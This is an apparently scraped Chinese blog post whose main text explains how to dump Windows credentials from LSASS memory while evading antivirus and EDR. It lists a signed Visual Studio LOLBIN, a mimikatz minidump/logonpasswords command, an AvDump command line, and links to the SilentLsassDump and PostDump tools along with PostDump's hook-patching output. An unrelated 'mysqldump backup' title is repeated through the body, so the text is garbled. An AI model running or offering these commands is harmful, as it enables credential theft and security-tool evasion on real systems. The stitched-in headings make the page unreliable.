mysqldump备份数据库(dump文件可以删除吗)

文章前言

获取Windows用户的凭证信息是渗透过程中至关重要的一步,如果没有杀软,那么只要有权限想怎么读就怎么读,当有杀软时就得用一些特别的技巧,本篇文章将简单介绍几种之前在Twitter上看到的小技巧,仅供大家参考

LOLBIN

文件路径(需要下载最新版本的VS2022):

C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\Extensions\\\\TestPlatform\\\\Extensions

证书说明:微软签名

转储实践:

mysqldump备份数据库(dump文件可以删除吗)

之后使用mimikatz查看dump.txt:

sekurlsa::minidump \\\"c:\\\\users\\\\mr.d0x\\\\downloads\\\\dump.txt\\\"sekurlsa::logonpasswords

mysqldump备份数据库(dump文件可以删除吗)

AvDump

文件下载(安全性自查):

https://github.com/f1tz/Misc/blob/9c41db77e41d42146467516ca865313f810c44f3/AvDump/x86/AvDump.exe

转储命令:

.\\\\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

mysqldump备份数据库(dump文件可以删除吗)

SilentLsassDump


项目地址:

https://github.com/guervild/BOFs/tree/dev/SilentLsassDump

mysqldump备份数据库(dump文件可以删除吗)

silentLsassDump <LSASS PID>

PostDump

项目地址:

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

项目介绍:PostDump是由COS团队(网络攻击和安全)开发的C#工具,它使用几种技术绕过EDR Hook和lsass保护来执行内存转储(lsass)

项目使用:

C:\\\\Temp>PostDump.exe
[*] NtReadVirtualMemory: HOOKED! Patching...[*] NtReadVirtualMemory --> NOT Hooked!
[*] NtOpenProcess: NOT Hooked![*] Real Process Handle: 728
[*] PssCaptureSnapshot: NOT Hooked![*] Snapshot succeed! Duplicate handle: 1549097566208
[*] MiniDumpWriteDump: NOT Hooked![*] Duplicate dump successful. Dumped 49737034 bytes to: c:\\\\Temp\\\\yolo.log

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34327.html

Like (0)
七芒星实验室的头像七芒星实验室
Previous 2024年4月18日
Next 2024年4月18日

相关推荐

  • 探索代理IP的未来:技术创新与互联网的变革

    探索代理IP的未来:技术创新与互联网的变革目前,代理IP技术在隐私保护、网络安全、数据采集等领域中发挥着越来越重要的作用。那么在未来,代理IP技术也将继续演变和提升,带来诸多新的趋势和变化。本文将探

    网站运维 2024年6月24日
    0
  • 如何安装windows系统

    windows系统的话基本都“通吃”所有电脑硬件了,不管你说的是哪国的鸟语,我windows都可以和你对上话。 如果你电脑原来没有任何操作系统,那么就是安装; 如果原来有了,现在要…

    2024年5月9日
    0
  • 配置 DNS基础服务,dns配置在哪里设置

    配置 DNS基础服务一、DNS原理
    查询方式
    递归查询             直接把结果给客户端 迭代查询 如果知道结果,把结果告诉客户端,如果不知道结果,会把查询转发到下一台DNS服务器 D

    网站运维 2024年7月4日
    0
  • 等保2.0自查表,扩展部分

    等保2.0自查表,扩展部分等保2.0自查表,扩展部分,参考标准:
    GB∕T 22239-2019 《信息安全技术 网络安全等级保护基本要求》
    GB∕T 28448-2019 《信息安全技术网络安

    网站运维 2024年6月24日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注